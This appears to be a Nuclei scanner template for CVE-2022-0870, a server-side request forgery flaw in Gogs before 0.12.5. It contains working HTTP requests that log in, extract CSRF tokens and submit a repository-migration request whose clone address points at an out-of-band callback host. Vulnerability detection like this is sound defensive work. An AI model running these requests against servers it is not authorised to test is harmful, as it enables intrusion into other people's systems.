id: CVE-2022-0870 info: name: Gogs <0.12.5 - Server-Side Request Forgery author: theamanrawat,Akincibor severity: medium description: | Gogs GitHub repository before 0.12.5 is susceptible to server-side request forgery. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. reference: - https://github.com/gogs/gogs/commit/91f2cde5e95f146bfe4765e837e7282df6c7cabb - https://huntr.dev/bounties/327797d7-ae41-498f-9bff-cc0bf98cf531 - https://nvd.nist.gov/vuln/detail/CVE-2022-0870 remediation: Fixed in version 0.12.5. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2022-0870 cwe-id: CWE-918 epss-score: 0.00185 cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* metadata: max-request: 4 verified: true vendor: gogs product: gogs tags: cve,cve2022,ssrf,gogs,authenticated,huntr http: - raw: - | GET /user/login HTTP/1.1 Host: {{Hostname}} - | POST /user/login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}} - | GET /repo/migrate HTTP/1.1 Host: {{Hostname}} - | POST /repo/migrate HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _csrf={{auth_csrf}}&clone_addr=https%3A%2F%2F{{interactsh-url}}&auth_username=&auth_password=&uid=1&repo_name={{randstr}}&description=test cookie-reuse: true matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "dns" - "http" - type: word part: body_1 words: - 'content="Gogs' extractors: - type: regex name: csrf group: 1 regex: - 'name="_csrf" value="(.*)"' internal: true - type: regex name: auth_csrf group: 1 regex: - 'name="_csrf" content="(.*)"' internal: true